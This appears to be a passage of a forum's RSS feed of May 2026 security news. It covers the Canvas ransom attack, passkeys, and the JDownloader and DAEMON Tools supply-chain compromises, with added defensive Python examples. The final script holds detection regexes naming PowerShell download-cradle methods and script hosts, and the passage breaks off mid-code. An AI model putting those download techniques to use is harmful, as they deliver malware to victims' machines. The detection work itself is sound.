<?xml version="1.0"?>
<rss version="2.0"><channel><title><![CDATA[News: Security & Privacy News]]></title><link>https://nsaneforums.com/news/security-privacy-news/page/2/?d=2</link><description><![CDATA[News: Security & Privacy News]]></description><language>en</language><item><title>International cyber attack disrupts swathe of universities and schools</title><link>https://nsaneforums.com/news/security-privacy-news/international-cyber-attack-disrupts-swathe-of-universities-and-schools-r34924/</link><description><![CDATA[<p>
	A cyber attack hit several universities and schools in the US, Canada and Australia, causing chaos, confusion and major disruption amid the high-stakes end-of-year exam season.
</p>

<p>
	 
</p>

<p>
	The hacking group ShinyHunters claimed responsibility for the attack, which caused the academic software Canvas used by thousands of schools and universities to go offline this week.
</p>

<p>
	 
</p>

<p>
	By late Thursday, the company Instructure, which owns Canvas, posted an update on its website saying that Canvas was "available for most users", but some universities were still reporting outages on Friday.
</p>

<p>
	 
</p>

<p>
	The cyber attacks targeted universities and schools across the globe, affecting an estimated 9,000 institutions.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="1422bb90-4b30-11f1-ac78-2112837ce2aa.jpg" class="ipsImage" data-ratio="75.10" height="540" width="430" src="https://ichef.bbci.co.uk/news/1024/cpsprodpb/113a/live/1422bb90-4b30-11f1-ac78-2112837ce2aa.jpg.webp" />
</p>

<p style="text-align:center;">
	<span style="font-size:12px;">A ransom note demanding payment in bitcoin appeared on screens during the cyber attack on the cloud-based learning platform Canvas.</span>
</p>

<p>
	 
</p>

<p>
	Mississippi State University announced that it was postponing Friday's final exams to allow affected students to recover any lost work.
</p>

<p>
	 
</p>

<p>
	Aubrey Palmer, a meteorology student at the university, told the BBC students had just finished a 2,900-word exam essay when a ransom note suddenly appeared on their screens.
</p>

<p>
	 
</p>

<p>
	The message read: "Shiny Hunters has breached Instructure (again)."
</p>

<p>
	 
</p>

<p>
	It threatened to release stolen data unless Canvas or the affected universities paid a ransom in bitcoin.
</p>

<p>
	 
</p>

<p>
	"My knee‑jerk reaction was that I'd been hacked myself, because that's what it looked like," Palmer said. "But then I actually read the ransom note and saw it was Canvas that had been hacked."
</p>

<p>
	 
</p>

<p>
	Palmer said the professor and dozens of other students all had the note and everyone was looking around the room in confusion.
</p>

<p>
	 
</p>

<p>
	At first, it was unclear whether their work had been saved.
</p>

<p>
	 
</p>

<p>
	Frustration quickly spread among the students, and Palmer said people became "so angry at the idea of having to redo" their exams.
</p>

<p>
	 
</p>

<p>
	The university has since been updating students by email, rescheduling exams, and advising them to ignore suspicious messages while responding to what it described as a "nationwide security incident".
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="51a48a80-4b2f-11f1-bd52-e755d604ece4.jpg" class="ipsImage" data-ratio="75.10" height="480" width="720" src="https://ichef.bbci.co.uk/news/1024/cpsprodpb/29b0/live/51a48a80-4b2f-11f1-bd52-e755d604ece4.jpg.webp" />
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<span style="font-size:12px;">The University of Sydney told students on Friday "Canvas was unavailable" and instructed students not to attempt to log in.</span>
</p>

<p>
	 
</p>

<p>
	"We are one of approximately 9000 institutions around the world that are impacted by this outage, and we are still waiting for advice from Instructure," the university wrote on its website.
</p>

<p>
	 
</p>

<p>
	The outage affected students' coursework and examinations, the university said, acknowledging "how disruptive this is at a critical time in the semester".
</p>

<p>
	 
</p>

<p>
	On Thursday, Idaho State University said it had cancelled exams scheduled after 12:00 local time (18:00 GMT).
</p>

<p>
	 
</p>

<p>
	Penn State University wrote in a message to students on Thursday that "no one has access" to Canvas, adding that a "resolution" was unlikely to arrive "within the next 24 hours". The university cancelled some exams scheduled for Thursday and Friday.
</p>

<p>
	 
</p>

<p>
	In an update on Thursday evening, the University of British Columbia in Vancouver informed students that Canvas was "unavailable due to a cyber breach of its parent company Instructure", and advised them to log out immediately.
</p>

<p>
	 
</p>

<p>
	The University of Toronto also reported it was impacted by the breach, saying that "multiple universities were affected".
</p>

<p>
	 
</p>

<p>
	Students at the University of California Los Angeles struggled to submit assignments online through the Canvas platform, and the University of Chicago, in Illinois, temporarily disabled its Canvas page after reports that it was targeted.
</p>

<p>
	The Chicago Maroon, the university's student newspaper, posted a screenshot of a message from ShinyHunters that appeared to be seeking a ransom.
</p>

<p>
	 
</p>

<p>
	The message encouraged the university to contact the hacking group privately "to negotiate a settlement" and avoid "the release of their data".
</p>

<p>
	 
</p>

<p>
	It was the same message that Northwestern University master's student Jacques Abou-Rizk said he received when he clicked a link in an email that appeared to be from a university administrator.
</p>

<p>
	 
</p>

<p>
	"I didn't know what was happening," Abou-Rizk recalled. "It's a scary message to receive."
</p>

<p>
	 
</p>

<p>
	He said the university addressed the issue on Thursday, sending a generic email, seen by the BBC, that said Northwestern was "monitoring an issue".
</p>

<p>
	 
</p>

<p>
	The email stated the university did not have an estimated restoration time for Canvas and that other IT infrastructure had not been affected.
</p>

<p>
	 
</p>

<p>
	Abou-Rizk said he was still unable to access Canvas on Friday and has not heard from the university since.
</p>

<p>
	 
</p>

<p>
	"There's definitely anxiety surrounding not only being able to complete my work and access the sites that I need access to on Canvas," Abou-Rizk said. "But also just not knowing exactly what the threat is and how it might affect me.
</p>

<p>
	 
</p>

<p>
	"I don't know what data will be released, and that scares me."
</p>

<p>
	 
</p>

<p>
	The BBC has contacted Northwestern University for comment.
</p>

<p>
	 
</p>

<p>
	ShinyHunters has been linked to several high‑profile cyber attacks in the past, including a major and economically damaging hack on Jaguar Land Rover last year.
</p>

<p>
	 
</p>

<p>
	Screenshots show the targeted threats from the group began on Sunday, with deadlines set for Thursday and 12 May, Luke Connolly, a threat analyst at the cyber security firm Emsisoft, told the Associated Press.
</p>

<p>
	 
</p>

<p>
	He said discussions regarding extortion payments could be ongoing.
</p>

<p>
	 
</p>

<p>
	The group would not say what it plans to do with the data it claims to have taken during the latest attack.
</p>

<p>
	 
</p>

<p>
	Thursday's cyber attacks came the same day that the top US Senate Democrat, Chuck Schumer, sent a letter to the Trump administration urging stronger defences against cyber risks in the age of rapidly developing AI.
</p>

<p>
	 
</p>

<p>
	The Department of Homeland Security - the agency that helps ward off cyber attacks - "must immediately help states and localities", Schumer wrote.
</p>

<p>
	 
</p>

<p>
	"Before Americans are hit with outages, disruptions, and attacks that could put lives and livelihoods at risk," he continued. 
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.bbc.com/news/articles/ce3pq0136eqo" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">34924</guid><pubDate>Sat, 09 May 2026 14:54:33 +0000</pubDate></item><item><title>Microsoft says passwords are no longer enough as it pushes passkeys</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-says-passwords-are-no-longer-enough-as-it-pushes-passkeys-r34916/</link><description><![CDATA[<h3>
	Microsoft claims regular passwords are no longer enough. As attacks use more sophisticated AI tools, the company pushes passkeys.
</h3>

<p class="img-center">
	<img alt="Passkey settings in Windows 11" class="ipsImage" height="405" width="720" src="https://cdn.neowin.com/news/images/uploaded/2026/05/1778237967_passkeys.webp">
</p>

<p>
	On World Password Day, the first Thursday of May, Microsoft published a blog post making the case for moving from traditional passwords to passkeys as attacks grow more advanced, including ones that use AI and other sophisticated techniques.
</p>

<p>
	 
</p>

<p>
	In a new security blog post, the company says passkeys are becoming increasingly important. According to Microsoft, passwords remain one of the weakest links in online security: they turn up in credential leaks and are harvested by phishing, so users should ditch them and switch to passkeys.
</p>

<p>
	 
</p>

<p>
	Microsoft is already a major passkey proponent. Earlier this year, the company announced that new Microsoft accounts are now passwordless by default, allowing users to sign in with passkeys, biometrics, or security keys instead of traditional passwords. Existing users can also remove passwords from their accounts manually. Additionally, Windows 11 now has better passkey integration, which allows it to <a href="https://www.neowin.net/news/microsoft-adds-native-support-for-1password-and-bitwarden-passkeys-in-windows-11/" rel="external nofollow">use passkeys stored in third-party managers</a> like 1Password or Bitwarden. Microsoft will also let you sync passkeys from Microsoft Password Manager to iOS and Android via the Edge browser.
</p>

<p>
	 
</p>

<p>
	Passkeys are simpler and more secure because the secret is a private key that never leaves the device and is unlocked locally with a fingerprint, a face scan or a PIN; the device only ever returns a signature, and that signature is bound to the website's origin, so nothing reusable is typed or transmitted. The origin binding is what makes passkeys resistant to phishing: a fake login page on another domain cannot obtain a signature that the real site will accept, and there is no password for it to harvest.
</p>
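<p>
	The origin binding that makes a passkey phishing-resistant is enforced by the website's server, not only by the device. The following is an added example written for this page, not code from Microsoft or from the Neowin article: a relying party's binding checks on a WebAuthn sign-in assertion in Python, standard library only. The RP ID, origin and challenge are assumed values, the client data and authenticator data are constructed rather than captured from a browser, and the final signature verification is left out because it needs a crypto library; the comments say which fields that signature would cover.
</p>

```python
import base64
import hashlib
import json

# Relying-party settings the server pins (assumed values for this example).
RP_ID = "login.example.test"
EXPECTED_ORIGIN = "https://login.example.test"


def b64url_decode(data: str) -> bytes:
    """Decode unpadded base64url, the encoding WebAuthn uses on the wire."""
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def make_client_data(origin: str, challenge: str) -> str:
    """Constructed clientDataJSON. The browser fills in 'origin' from the page the
    user is actually on; a phishing page cannot choose this value."""
    doc = {"type": "webauthn.get", "challenge": challenge, "origin": origin}
    return b64url_encode(json.dumps(doc).encode())


def make_authenticator_data(rp_id: str, flags: int = 0x05, counter: int = 1) -> str:
    """Constructed authenticatorData: SHA-256(rpId) || flags || 4-byte signature counter.
    flags 0x05 = user present (0x01) and user verified (0x04)."""
    rp_id_hash = hashlib.sha256(rp_id.encode()).digest()
    return b64url_encode(rp_id_hash + bytes([flags]) + counter.to_bytes(4, "big"))


def check_assertion_binding(client_data_b64: str, auth_data_b64: str, expected_challenge: str) -> tuple:
    """The relying party's binding checks for a WebAuthn 'get' ceremony.

    Returns (ok, reason). Deliberately stops short of verifying the signature,
    which needs a crypto library; that signature covers
    authenticatorData || SHA-256(clientDataJSON), so every field checked here
    is under the authenticator's signature and cannot be altered in transit.
    """
    try:
        client_data = json.loads(b64url_decode(client_data_b64))
    except ValueError:
        return False, "clientDataJSON is not valid base64url JSON"
    if client_data.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if client_data.get("challenge") != expected_challenge:
        return False, "challenge mismatch (replayed or stale assertion)"
    if client_data.get("origin") != EXPECTED_ORIGIN:
        return False, "origin mismatch: %r" % client_data.get("origin")

    auth_data = b64url_decode(auth_data_b64)
    if len(auth_data) < 37:
        return False, "authenticatorData too short"
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash is not SHA-256 of our RP ID"
    flags = auth_data[32]
    if not flags & 0x01:
        return False, "user presence flag not set"
    if not flags & 0x04:
        return False, "user verification flag not set"
    return True, "ok"


# Worked cases on constructed data.
CHALLENGE = b64url_encode(b"32-bytes-of-server-side-randomness!!")
LEGIT = check_assertion_binding(
    make_client_data(EXPECTED_ORIGIN, CHALLENGE), make_authenticator_data(RP_ID), CHALLENGE
)
# A look-alike phishing domain: the browser reports its real origin and the
# authenticator scopes the credential to that domain, so both checks fail.
PHISHED = check_assertion_binding(
    make_client_data("https://login-example.test", CHALLENGE),
    make_authenticator_data("login-example.test"),
    CHALLENGE,
)
```

<p>
	The phishing case is rejected on the origin check first, and would be rejected on rpIdHash if that check ran alone; in practice it would not even reach the server, because the authenticator holds no credential scoped to the look-alike domain and so has nothing to sign. A real relying party also keeps the challenge single-use and verifies the signature with the public key stored at registration.
</p>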

<p>
	 
</p>

<p>
	Microsoft is not alone in this effort. The wider tech industry, including members of the FIDO Alliance, has been heavily promoting passkey adoption over the last year as part of a broader push toward passwordless authentication, and the FIDO Alliance estimates that 5 billion passkeys are already in use worldwide. Microsoft adds that "hundreds of millions of users" have already switched to passkeys for OneDrive, Xbox, and other Microsoft-made consumer services. The company says it has moved its own environment to phishing-resistant authentication as well:
</p>

<blockquote class="QuoteNewsStyle">
	<p>
		Inside Microsoft, we’ve eliminated weaker authentication methods and rolled out phishing-resistant authentication, covering 99.6% of users and devices in our environment. It’s made signing in a lot simpler: no codes to enter, no extra prompts to manage, just a straightforward experience for everyone.
	</p>
</blockquote>

<p>
	Microsoft also wants to stop attackers from phishing the account recovery path instead of the password: starting January 2027, security questions will no longer be able to reset Microsoft Entra ID passwords.
</p>

<p>
	 
</p>

<p>
	You can read more about the company's password-less efforts in <a href="https://www.microsoft.com/en-us/security/blog/2026/05/07/world-passkey-day-advancing-passwordless-authentication/" rel="external nofollow">a post on the official blog</a>.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/microsoft-says-passwords-are-no-longer-enough-as-it-pushes-passkeys/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Saturday 9 May 2026 at 7:15 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of April) 1,700</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">34916</guid><pubDate>Fri, 08 May 2026 21:16:18 +0000</pubDate></item><item><title>If you downloaded this popular software recently, you might have installed malware</title><link>https://nsaneforums.com/news/security-privacy-news/if-you-downloaded-this-popular-software-recently-you-might-have-installed-malware-r34910/</link><description><![CDATA[<p>
	<span style="font-size:14px;"><strong>Hackers exploited an unpatched security vulnerability on JDownloader's website and used it to serve malware-laced downloads.</strong></span>
</p>

<p>
	 
</p>

<p>
	The website for the popular download manager, JDownloader, has been compromised by attackers who spent over a day serving malicious installers to Windows and Linux users, replacing the legitimate download files with malware.
</p>

<p>
	 
</p>

<p>
	The JDownloader team first confirmed the hack yesterday and immediately took down the website for a full investigation. The action came after a user on Reddit reported that fresh downloads were being flagged by Windows SmartScreen and showed a suspicious publisher, "Zipline LLC", instead of the expected "AppWork" signature. The post quickly gained traction and prompted a developer from the team to step in and confirm the breach.
</p>

<p>
	 
</p>

<p>
	The JDownloader team <a href="https://old.reddit.com/r/jdownloader/comments/1t6goqe/is_the_website_hacked/okhg2ur/" rel="external nofollow">said</a> that its initial investigation confirmed a limited but serious breach. The attackers modified the alternative download page on May 6, replacing all the alternative Windows installer links with their own malicious, unsigned executables.
</p>

<p>
	 
</p>

<p>
	The Linux shell installer was also swapped for a version containing malicious shell commands. The team was quick to reassure users that the main JDownloader.jar file, the macOS installers, and the packages from repositories such as Winget, Flatpak and Snap were never compromised: those packages are served from separate infrastructure and verified with checksums, and in-app updates are protected by end-to-end digital signatures. The practical consequence is that a signed in-app update is the safer path when the website itself is what has been compromised.
</p>
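<p>
	The checksum protection described above only helps if the checksums come from a channel the attacker did not control and if the check is actually performed before the file is run. As an added example, not JDownloader's own tooling, here is a Python verifier for a coreutils-style SHA256SUMS manifest against a set of downloaded files. Apart from JDownloader.jar, the file names, the file contents and the manifest are constructed for the example.
</p>

```python
import hashlib
import re

# coreutils sha256sum format: 64 hex digits, a space, then a space (text mode)
# or an asterisk (binary mode), then the file name.
MANIFEST_LINE = re.compile(r"^([0-9a-fA-F]{64}) [ *](.+?)\s*$")


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def parse_manifest(text: str) -> dict:
    """Parse a checksum manifest into {file name: expected sha256}.
    A malformed line is an error, not something to skip silently: a manifest
    that parsed to nothing would otherwise make every file 'not listed'."""
    expected = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        match = MANIFEST_LINE.match(line)
        if not match:
            raise ValueError("manifest line %d is malformed: %r" % (lineno, line))
        expected[match.group(2)] = match.group(1).lower()
    return expected


def verify_downloads(manifest_text: str, downloaded: dict) -> dict:
    """Check {file name: bytes} against the manifest.
    Result per name: 'ok', 'MISMATCH', 'not listed' (file not in manifest) or
    'missing' (listed but not downloaded). Run nothing that is not 'ok'."""
    expected = parse_manifest(manifest_text)
    report = {}
    for name, data in downloaded.items():
        if name not in expected:
            report[name] = "not listed"
        elif sha256_hex(data) == expected[name]:
            report[name] = "ok"
        else:
            report[name] = "MISMATCH"
    for name in expected:
        report.setdefault(name, "missing")
    return report


# Constructed release: clean files plus the manifest a separate, trusted channel
# would publish for them. File names other than JDownloader.jar are made up.
CLEAN_FILES = {
    "JDownloader.jar": b"constructed clean jar contents",
    "JD2Setup_x64.exe": b"constructed clean installer contents",
    "install.sh": b"#!/bin/sh\n# constructed clean installer script\n",
}
MANIFEST = "# constructed SHA256SUMS\n" + "".join(
    "%s  %s\n" % (sha256_hex(data), name) for name, data in CLEAN_FILES.items()
)

# What a user fetched from a tampered download page: the Windows installer and
# the shell installer were swapped, the jar was not.
DOWNLOADED = dict(CLEAN_FILES)
DOWNLOADED["JD2Setup_x64.exe"] = b"constructed trojanised installer contents"
DOWNLOADED["install.sh"] = b"#!/bin/sh\n# constructed malicious installer script\n"
REPORT = verify_downloads(MANIFEST, DOWNLOADED)
```

<p>
	A manifest fetched from the same page as the installer proves nothing, since whoever swapped the installer could regenerate it; the manifest has to come from a package repository, a signed release note or another channel the attacker did not control. A checksum also says nothing about who built the file, which is why a publisher mismatch in SmartScreen was the tell here.
</p>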

<p>
	 
</p>

<p>
	The attackers got in through an "unpatched" security bug on the website that let them alter the site's access control lists without authenticating. After granting themselves edit rights, they simply replaced the official download links with their own. Reports from users who ran the infected files are grim, with some stating that the malware disabled Windows Defender entirely.
</p>

<p>
	 
</p>

<p>
	JDownloader is the latest victim of a supply chain-style attack that uses the popularity of a trusted utility to deliver malware. Just last month, hackers <a href="https://www.neowin.net/news/cpu-z-and-hwmonitor-downloads-tampered-with-by-hackers-in-new-supply-chain-style-attack/" rel="external nofollow">breached the official website</a> of CPUID (the maker of the popular hardware diagnostic tools CPU-Z and HWMonitor) and served a deceptively named file (HWiNFO_Monitor_Setup.exe) that tripped Windows Defender.
</p>

<p>
	 
</p>

<p>
	For CPU-Z, the hackers bundled a malicious, Zig-compiled file named CRYPTBASE.dll with the otherwise clean CPU-Z application. Windows searches an application's own directory before the system directories when it resolves a DLL, so the clean program loaded the planted, malicious DLL into its memory space instead of the legitimate one (a DLL search-order hijack). After a Reddit user raised the alarm, CPUID quickly took down the website, patched the API vulnerability, and restored the clean download links.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/if-you-downloaded-this-popular-software-recently-you-might-have-installed-malware/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">34910</guid><pubDate>Fri, 08 May 2026 15:45:52 +0000</pubDate></item><item><title>DAEMON Tools devs confirm breach, release malware-free version</title><link>https://nsaneforums.com/news/security-privacy-news/daemon-tools-devs-confirm-breach-release-malware-free-version-r34884/</link><description><![CDATA[<p>
	Disc Soft Limited, the maker of DAEMON Tools Lite, confirmed that the software had been trojanized in a supply chain attack and released a new, malware-free version.
</p>

<p>
	 
</p>

<p>
	"Within less than 12 hours of identifying the issue, we were able to implement a solution. Based on our current findings, the issue was limited to the free DAEMON Tools Lite version and did not affect any of our other products," Disc Soft told BleepingComputer.
</p>

<p>
	 
</p>

<p>
	"We have not identified evidence supporting claims that all DAEMON Tools users were impacted, and at this stage, we are not in a position to confirm any impact on paid versions customers. Our current analysis indicates that DAEMON Tools Pro and DAEMON Tools Ultra were not affected and absolutely safe."
</p>

<p>
	 
</p>

<p>
	In a separate statement published earlier today, Disc Soft also said it has secured its infrastructure. Still, it has yet to attribute the attack to a specific threat actor or share additional information about the breach, including the attack vector used to access its systems, as it continues to investigate the incident.
</p>

<p>
	 
</p>

<p>
	"Following an internal investigation, we identified unauthorized interference within our infrastructure. As a result, certain installation packages were impacted within our build environment and were released in a compromised state. Version 12.6 of DAEMON Tools Lite, which does not contain the suspected compromised files, was released on May 5," <a href="https://blog.daemon-tools.cc/post/security-incident" rel="external nofollow" target="_blank">the company said</a>.
</p>

<p>
	 
</p>

<p>
	"Users of other DAEMON Tools products, including paid versions of DAEMON Tools Lite, DAEMON Tools Ultra, and DAEMON Tools Pro are not affected by this incident and can continue using their software as usual."
</p>

<p>
	 
</p>

<p>
	Users who downloaded or installed DAEMON Tools Lite version 12.5.1 (free) since April 8 are advised to uninstall the app, run a full system scan with security or antivirus software, and install the latest version of DAEMON Tools Lite (12.6) from the official website. Because the trojanized installers carried a valid Disc Soft signature, a signature check will not tell a clean copy from a backdoored one; go by the version and build number and by the install date instead.
</p>

<p>
	 
</p>

<p>
	Disc Soft has removed the trojanized version, which is no longer supported, and now displays a warning prompting users to install the latest version of DAEMON Tools Lite.
</p>

<p>
	 
</p>

<div style="">
	<figure class="image" style="display:inline-block">
		<img alt="DAEMON Tools Lite 12.5.1 warning" class="ipsImage" height="495" width="720" src="https://www.bleepstatic.com/images/news/u/1109292/2026/DAEMON%20Tools%20Lite%2012_5_1%20warning.jpg">
		<figcaption>
			<em>DAEMON Tools Lite 12.5.1 warning (<a href="https://infosec.exchange/@wdormann" rel="external nofollow" target="_blank">Will Dormann</a>)</em>
		</figcaption>
	</figure>
</div>

<p>
	As cybersecurity company Kaspersky revealed on Tuesday, <a href="https://www.bleepingcomputer.com/news/security/daemon-tools-trojanized-in-supply-chain-attack-to-deploy-backdoor/" rel="external nofollow" target="_blank">hackers trojanized DAEMON Tools Lite installers</a> and used them to backdoor thousands of systems from more than 100 countries that downloaded the software from the official website since April 8.
</p>

<p>
	 
</p>

<p>
	After the unsuspecting users executed the digitally signed trojanized installers (versions ranging from 12.5.0.2421 to 12.5.0.2434), the malicious code embedded in the compromised binaries deployed a payload designed to establish persistence and activate a backdoor on system startup.
</p>

<p>
	 
</p>

<p>
	The first-stage malware dropped in the attack was a basic information stealer that collected system data (including hostname, MAC address, running processes, installed software, and system locale) and sent it to attacker-controlled servers for victim profiling. Based on the results, some of the infected systems received a second stage, a lightweight backdoor that can execute commands, download files, and run code directly in memory.
</p>

<p>
	 
</p>

<p>
	In at least one case, Kaspersky observed the deployment of the QUIC RAT malware, which can inject malicious code into legitimate processes and supports multiple communication protocols.
</p>

<p>
	 
</p>

<p>
	While investigating the attack, Kaspersky found that retail, scientific, government, and manufacturing organizations in Russia, Belarus, and Thailand, as well as home users in Russia, Brazil, Turkey, Spain, Germany, France, Italy, and China, were among the victims whose devices were infected with malicious payloads.
</p>

<p>
	 
</p>

<p>
	Today, in an update to the original report, the Russian cybersecurity company confirmed that DAEMON Tools Lite 12.6.0, released yesterday, no longer exhibits malicious behavior.
</p>

<p>
	 
</p>

<p>
	"Following disclosure, the vendor acknowledged the issue and published a new version of the software to address it," Kaspersky said. "The updated DAEMON Tools version 12.6.0.2445 no longer shows the malicious behavior."
</p>

<p>
	 
</p>

<p>
	<em>Update May 06, 14:09 EDT</em>: Added Disc Soft statement.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/daemon-tools-devs-confirm-breach-release-malware-free-version/" rel="external nofollow">Source</a>
</p>


<hr class="ipsHr">

<p>
	<span style="font-size:12px;"><em>Posted Thursday 7 May 2026 at 6:59 am AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">34884</guid><pubDate>Wed, 06 May 2026 21:01:35 +0000</pubDate></item><item><title>DAEMON TOOLS supply chain attack ongoing since April, thousands affected</title><link>https://nsaneforums.com/news/security-privacy-news/daemon-tools-supply-chain-attack-ongoing-since-april-thousands-affected-r34878/</link><description><![CDATA[<p>
	<span style="font-size:14px;"><strong>Security researchers have identified an active supply chain compromise in DAEMON Tools installers impacting users globally since April 2026.</strong></span>
</p>

<p>
	 
</p>

<p>
	A major supply chain attack targeting the widely used disk imaging software DAEMON Tools has been uncovered, with malicious installers distributed through official channels since early April 2026. According to findings published by Kaspersky, attackers compromised legitimate installers and embedded backdoors into signed binaries, allowing malware to be delivered under the guise of trusted software updates.
</p>

<p>
	 
</p>

<p>
	The campaign began on April 8, 2026, when multiple versions of DAEMON Tools (12.5.0.2421 to 12.5.0.2434) were trojanised. The infected installers were hosted on the software’s official website and signed using valid digital certificates belonging to developer AVB Disc Soft. This made the malicious packages appear authentic, significantly increasing the likelihood of successful infection. Researchers say the attack remains active as of early May, with infrastructure still operational.
</p>

<p>
	 
</p>

<p>
	Several core binaries, including DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe, were modified to include a hidden backdoor. Once installed, these components run automatically at system startup and establish communication with an external command-and-control server. The attackers also used a domain designed to resemble the legitimate DAEMON Tools website, further blending malicious traffic with normal traffic. The malicious domain was registered just days before the campaign began, suggesting a carefully planned operation.
</p>

<p>
	 
</p>

<p>
	The attack follows a staged structure. In most cases, infected systems first receive an information-stealing payload that gathers system data such as MAC addresses, hostnames, installed software, running processes, network configuration, and system locale. This information is then sent to attacker-controlled servers and is likely used to profile compromised systems and assess their value for further exploitation. Interestingly, parts of this payload contain Chinese-language strings, hinting at a possible Chinese-speaking threat actor; however, no formal attribution has been made.
</p>

<p>
	 
</p>

<p>
	Despite thousands of infections observed globally, only a small subset of infected machines received additional malware beyond the initial payload. These higher-value targets were associated with organisations operating in the government, manufacturing, scientific research, and retail sectors. The selective nature of this deployment suggests that the operation was not purely opportunistic, but instead involved targeted objectives consistent with espionage or strategic intrusion activity.
</p>

<p>
	 
</p>

<p>
	Among the second-stage tools identified was a minimalistic backdoor capable of executing commands, downloading files, and running code directly in memory. In at least one confirmed case, a more advanced implant known as QUIC RAT was deployed. This malware supports multiple communication protocols, including HTTP, TCP, DNS, and QUIC, and can inject code into legitimate processes such as notepad.exe.
</p>

<p>
	 
</p>

<p>
	Telemetry data shows thousands of infection attempts across more than 100 countries. The highest number of affected systems was recorded in Russia, Brazil, Turkey, Spain, Germany, France, Italy, and China. Around ten percent of affected systems belonged to organisations, while most systems only received the initial data-collection stage.
</p>

<p>
	 
</p>

<p>
	Security tools from Kaspersky reportedly detect the malicious activity at multiple stages, including suspicious PowerShell-based downloads, malware execution from temporary directories, code injection into legitimate processes, and unusual outbound network traffic.
</p>

<p>
	 
</p>

<p>
	Organisations are advised to carry out audits of systems where DAEMON Tools was installed after 8 April 2026. It is also recommended to monitor systems for unusual command-line activity, particularly involving PowerShell. In addition, organisations are encouraged to implement zero-trust security models and restrict execution from temporary directories.
</p>
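<p>
	The build range Kaspersky published, quoted in the earlier DAEMON Tools item on this page (12.5.0.2421 through 12.5.0.2434), together with the detection points listed above, is enough to script the audit this paragraph recommends. What follows is an added Python example written for this page, not Kaspersky's or Disc Soft's tooling: it flags affected installs in an inventory export and triages process-creation events for the behaviours the report names (PowerShell downloads, execution from temporary directories, notepad.exe started by a DAEMON Tools component). Host names, dates, paths, the sample URL and the regex patterns are the editor's assumptions. The vendor's "12.5.1" label is not a four-part build number, so an install carrying that label inside the campaign window is reported for a manual build-number check rather than matched directly.
</p>

```python
import re

# From the Kaspersky findings quoted on this page: the trojanised build range and
# the binaries that were modified to carry the backdoor.
AFFECTED_MIN = (12, 5, 0, 2421)
AFFECTED_MAX = (12, 5, 0, 2434)
FIRST_CLEAN = (12, 6, 0, 0)
CAMPAIGN_START = "2026-04-08"
TAMPERED_BINARIES = {"dthelper.exe", "discsoftbusservicelite.exe", "dtshellhlp.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe", "mshta.exe"}

# Heuristics for the detection points the report lists; the patterns are the editor's.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"Start-BitsTransfer|-enc(odedcommand)?\b", re.I)
TEMP_DIR = re.compile(r"\\(Temp|Tmp)\\", re.I)


def parse_version(text: str) -> tuple:
    """'12.5.0.2430' -> (12, 5, 0, 2430); shorter strings are right-padded with zeros."""
    parts = [int(p) for p in re.findall(r"\d+", text)][:4]
    return tuple(parts + [0] * (4 - len(parts)))


def is_affected_build(version: str) -> bool:
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def audit_inventory(inventory: list) -> list:
    """inventory: [{'host', 'name', 'version', 'install_date'}] from an asset export.
    Flags builds in the trojanised range, plus any DAEMON Tools install dated
    inside the campaign window that is older than 12.6 but cannot be matched on
    build number (a bare '12.5.1' label needs a lookup of the real build)."""
    findings = []
    for item in inventory:
        if "daemon tools" not in item["name"].lower():
            continue
        label = "%s %s on %s" % (item["name"], item["version"], item.get("host", "?"))
        if is_affected_build(item["version"]):
            findings.append(label + ": build in trojanised range, treat as compromised")
        elif item.get("install_date", "") >= CAMPAIGN_START and parse_version(item["version"]) < FIRST_CLEAN:
            findings.append(label + ": installed in campaign window and older than 12.6, confirm build number")
    return findings


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_process_events(events: list) -> list:
    """events: process-creation records {'pid', 'image', 'parent_image', 'command_line'}.
    Returns the events matching one or more of the report's detection points."""
    hits = []
    for ev in events:
        image, parent = basename(ev["image"]), basename(ev["parent_image"])
        reasons = []
        if parent in TAMPERED_BINARIES and image in SHELLS:
            reasons.append("DAEMON Tools component spawned a script host")
        if image in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_CRADLE.search(ev["command_line"]):
            reasons.append("PowerShell download cradle")
        if TEMP_DIR.search(ev["image"]):
            reasons.append("execution from a temporary directory")
        if parent in TAMPERED_BINARIES and image == "notepad.exe":
            reasons.append("notepad.exe started by DAEMON Tools component (named injection target)")
        if reasons:
            hits.append({"pid": ev["pid"], "image": ev["image"], "reasons": reasons})
    return hits


# Constructed sample data: hosts, dates, paths, the 12.5.0.2410 build and the URL are made up.
INVENTORY = [
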